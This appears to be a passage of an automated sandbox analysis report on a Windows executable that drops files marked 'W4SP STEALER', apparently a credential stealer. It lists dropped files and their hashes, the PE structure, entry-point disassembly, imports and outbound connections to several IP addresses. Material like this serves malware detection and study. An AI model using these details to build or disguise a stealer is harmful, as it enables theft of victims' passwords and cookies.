Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.820827594031884
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViZHKRRP+tPCCfA5S:RtBMwlViojWBBf
MD5:	4D57030133E279CEB6A8236264823DFD
SHA1:	0FDC3988857C560E55D6C36DCC56EE21A51C196D
SHA-256:	1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
SHA-512:	CD98F2A416AC1B13BA82AF073D0819C0EA7C095079143CAB83037D48E9A5450D410DC5CF6B6CFF3F719544EDF1C5F0C7E32E87B746F1C04FE56FAFD614B39826
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\entry_points.txt

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2740
Entropy (8bit):	4.540737240939103
Encrypted:	false
SSDEEP:	48:lELcZDy3g6ySDsm90rZh2Phv4hhpTqTog:yLAP8arZoP94hTTqcg
MD5:	D3262B65DB35BFFAAC248075345A266C
SHA1:	93AD6FE5A696252B9DEF334D182432CDA2237D1D
SHA-256:	DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
SHA-512:	1726750B22A645F5537C20ADDF23E3D3BAD851CD4BDBA0F9666F9F6B0DC848F9919D7AF8AD8847BD4F18D0F8585DDE51AFBAE6A4CAD75008C3210D17241E0291
Malicious:	false
Preview:	[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\top_level.txt

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	41
Entropy (8bit):	3.9115956018096876
Encrypted:	false
SSDEEP:	3:3Wd+Nt8AfQYv:3Wd+Nttv
MD5:	789A691C859DEA4BB010D18728BAD148
SHA1:	AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
SHA-256:	77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
SHA-512:	BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
Malicious:	false
Preview:	_distutils_hack.pkg_resources.setuptools.

C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1504536
Entropy (8bit):	6.579196400879108
Encrypted:	false
SSDEEP:	24576:P5EGpXUzJLtMyDHeWWAENOp8TaqQqP/mPhp44gyBGAidNlY30VM:PvqFLtMIHeWWA+U8TaYQhpzgycAPn
MD5:	B49B8FDE59EE4E8178C4D02404D06EE7
SHA1:	1816FC83155D01351E191D583C68E722928CCE40
SHA-256:	1AFD7F650596AD97FCF358B0E077121111641C38CA9D53132BAB4C9588CF262F
SHA-512:	A033CE87C2E503B386FB92AA79A7EC14D6C96E4A35D0CB76D4989BACD16F44C4ED5AC4E13057F05F9D199A3FD8545B9A25296515EC456F29C464D949FF34942A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J.O.......A.......N.......K.......G.......@...C......Y...B...Y...B...Y...B...Y...B...RichC...........................PE..d....l.d.........." ...$.............................................................D....`.........................................px...".............................../...........*..T............................(..@...............8............................text............................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1141016
Entropy (8bit):	5.435066249596469
Encrypted:	false
SSDEEP:	12288:P3EYbfjwR6nbsonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1JD:PUYbMB0IDJcjEwPgPOG6Xyd461JD
MD5:	1905B5D0F945499441E8CD58EB123D86
SHA1:	117E584E6FCC0E8CFC8E24E3AF527999F14BAC30
SHA-256:	B1788B81FA160E5120451F9252C7745CDDE98B8CE59BF273A3DD867BB034C532
SHA-512:	ED88CD7E3259239A0C8D42D95FA2447FC454A944C849FA97449AD88871236FEFDAFE21DBFA6E9B5D8A54DDF1D5281EC34D314CB93D47CE7B13912A69D284F522
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D\|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.@..........P*..............................................J.....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp_date.txt

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.4464393446710155
Encrypted:	false
SSDEEP:	3:tWIP:km
MD5:	885D4687480CE5CE35AB3654BD1BF789
SHA1:	F75D633E222D4417C6C7ED6D1CA34048E7E49C4B
SHA-256:	018345DCF5D8B0A2BC3932C1E9AC9FC8D4252BC7CE26FDA2FD6A607BECBD42DE
SHA-512:	6C4860754DB734A94167D3D4F8F618EECB56C9AF58047761523E2F64B3B147F01472122449D3C4DB92DBC8A6F58B74D7C15B6729A32D8038F61B55632890529F
Malicious:	false
Preview:	2023-09-08

C:\Users\user\AppData\Local\Temp\v4dbkbg2

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:qn:qn
MD5:	3F1D1D8D87177D3D8D897D7E421F84D6
SHA1:	DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256:	F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512:	2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious:	false
Preview:	blat

C:\Users\user\AppData\Local\Temp\wpcook.txt

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:v1PWgkpg1qreCS:FWhpg1qreCS
MD5:	CE49C0050F7F067FF769599925706543
SHA1:	A9D5EC8DA3F6274D60D4963746F345CA44716006
SHA-256:	16838507DB2CF241FB39AE1AC56A4A22855C76081471FE6905A705CF0E312445
SHA-512:	09BD14164EF64FDB6BBEB16BF435EDE2C809D1486B641A765B1900F734E8F73542A89E7BEC6E2094A08DB4AFC28C442AF98890828D4A95AFF34C5FF9C87E6488
Malicious:	false
Preview:	<--W4SP STEALER ON TOP-->....

C:\Users\user\AppData\Local\Temp\wppassw.txt

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:v1PWgkpg1qreCS:FWhpg1qreCS
MD5:	CE49C0050F7F067FF769599925706543
SHA1:	A9D5EC8DA3F6274D60D4963746F345CA44716006
SHA-256:	16838507DB2CF241FB39AE1AC56A4A22855C76081471FE6905A705CF0E312445
SHA-512:	09BD14164EF64FDB6BBEB16BF435EDE2C809D1486B641A765B1900F734E8F73542A89E7BEC6E2094A08DB4AFC28C442AF98890828D4A95AFF34C5FF9C87E6488
Malicious:	false
Preview:	<--W4SP STEALER ON TOP-->....

C:\Users\user\AppData\Local\Tempwpoeprdosk.db

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempwpvthvufeh.db

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.996773928931689
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KzqQe0QtRd.exe
File size:	14'042'365 bytes
MD5:	7fe90dcf5c49fd85ce12939b8cc3315c
SHA1:	0f374492f754c2f4693dfba41c190ff66c87be3b
SHA256:	60ee0d0e9f0799545b6d1739f6554a1591bf62c6efaee94f48fea42e7d4e4f1f
SHA512:	891dac19537497487f09587acb243676d73dc3c11dfe6bb65a82693a550699a2be24b1835d65d4bbd9f274fcfe5b0817ab8ca55f4c96a7b34710af873f0b1b33
SSDEEP:	196608:PnEZYDwGcsAgejtcGfcY3gtywIf7E5MsFwMF8SMjdeuFtU3gjcHu6wpE/U:f4Yk3meBcGfdlYMO8KuF23gjqur5
TLSH:	81E63312D26919E5CDD3003AC641C525DBA27CA69B60C38F03B0949A2FAB9DC7D7FF61
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r................

File Icon


Icon Hash:	eb2321602321138b

Static PE Info

General

Entrypoint:	0x14000b340
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x64EB97F0 [Sun Aug 27 18:37:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	0b5552dccd9d0a834cea55c0c8fc05be

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F6EF4D32C1Ch
dec eax
add esp, 28h
jmp 00007F6EF4D3282Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F6EF4D33194h
test eax, eax
je 00007F6EF4D329D3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F6EF4D329B7h
dec eax
cmp ecx, eax
je 00007F6EF4D329C6h
xor eax, eax
dec eax
cmpxchg dword ptr [000411ECh], ecx
jne 00007F6EF4D329A0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F6EF4D329A9h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [000411D7h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [000411C7h], al
call 00007F6EF4D32F93h
call 00007F6EF4D340C2h
test al, al
jne 00007F6EF4D329B6h
xor al, al
jmp 00007F6EF4D329C6h
call 00007F6EF4D406A1h
test al, al
jne 00007F6EF4D329BBh
xor ecx, ecx
call 00007F6EF4D340D2h
jmp 00007F6EF4D3299Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0004118Ch], 00000000h
mov ebx, ecx
jne 00007F6EF4D32A19h
cmp ecx, 01h
jnbe 00007F6EF4D32A1Ch
call 00007F6EF4D330FAh
test eax, eax
je 00007F6EF4D329DAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3bcd4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x1730	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4e000	0x20a0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0x758	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39480	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39340	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x418	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28830	0x28a00	False	0.5571334134615384	data	6.48139234696373	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x12ade	0x12c00	False	0.5151171875	data	5.822765086998648	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x103f8	0xe00	False	0.13309151785714285	DOS executable (block device driver \377\3)	1.8096886543499544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x4e000	0x20a0	0x2200	False	0.4749540441176471	data	5.22608226661587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x51000	0x15c	0x200	False	0.38671875	data	2.734076656433961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x1730	0x1800	False	0.32763671875	data	4.785639358631937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54000	0x758	0x800	False	0.544921875	data	5.2576643703968475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x520e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.28330206378986866
RT_GROUP_ICON	0x53190	0x14	data	1.1
RT_MANIFEST	0x531a4	0x58a	XML 1.0 document, ASCII text, with CRLF line terminators	0.44569816643159377

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 8, 2023 07:31:25.403422117 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:25.403506994 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:25.403609037 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:25.405745983 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:25.405792952 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:25.406275988 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:25.406322956 CEST	443	49716	51.38.43.18	192.168.2.7
Sep 8, 2023 07:31:25.406389952 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:26.021878004 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.022788048 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.022819042 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.024768114 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.024854898 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.027950048 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.028074980 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.028151989 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.071939945 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.072010040 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.122579098 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.411731958 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.411847115 CEST	443	49715	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:26.411979914 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.412825108 CEST	49715	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:26.749906063 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:26.749969006 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:26.750046015 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:26.751420021 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:26.751450062 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.714685917 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.715256929 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:27.715291023 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.716722012 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.716814041 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:27.719479084 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:27.719530106 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:27.719620943 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.775213003 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:27.775262117 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:27.822081089 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:28.044123888 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:28.044238091 CEST	443	49717	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:28.044306993 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:28.045213938 CEST	49717	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:28.415219069 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.415282965 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.415355921 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.417104006 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.417149067 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.764024973 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.764787912 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.764821053 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.767004013 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.767096996 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.770740032 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.770874023 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.771119118 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.771131992 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:28.771281958 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:28.815485001 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:29.322201967 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:29.322360039 CEST	443	49718	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:29.322525978 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:29.323836088 CEST	49718	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:30.204214096 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:30.204266071 CEST	443	49716	51.38.43.18	192.168.2.7
Sep 8, 2023 07:31:31.218100071 CEST	443	49716	51.38.43.18	192.168.2.7
Sep 8, 2023 07:31:31.219779968 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:31.219852924 CEST	443	49716	51.38.43.18	192.168.2.7
Sep 8, 2023 07:31:31.222938061 CEST	443	49716	51.38.43.18	192.168.2.7
Sep 8, 2023 07:31:31.223201990 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:31.226089954 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:31.226419926 CEST	49716	443	192.168.2.7	51.38.43.18
Sep 8, 2023 07:31:31.913831949 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:31.913903952 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:31.914002895 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:31.914804935 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:31.914824009 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.522542953 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.534657955 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.534704924 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.536607027 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.536787987 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.540225983 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.540477991 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.540527105 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.583511114 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.666294098 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.666373968 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.885030985 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:32.919593096 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.919766903 CEST	443	49719	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:32.919881105 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:34.194210052 CEST	49719	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:34.704921007 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:34.704998016 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:34.705084085 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:34.706121922 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:34.706150055 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:35.660866022 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:35.661449909 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:35.661484957 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:35.662750006 CEST	443	49720	159.89.102.253	192.168.2.7
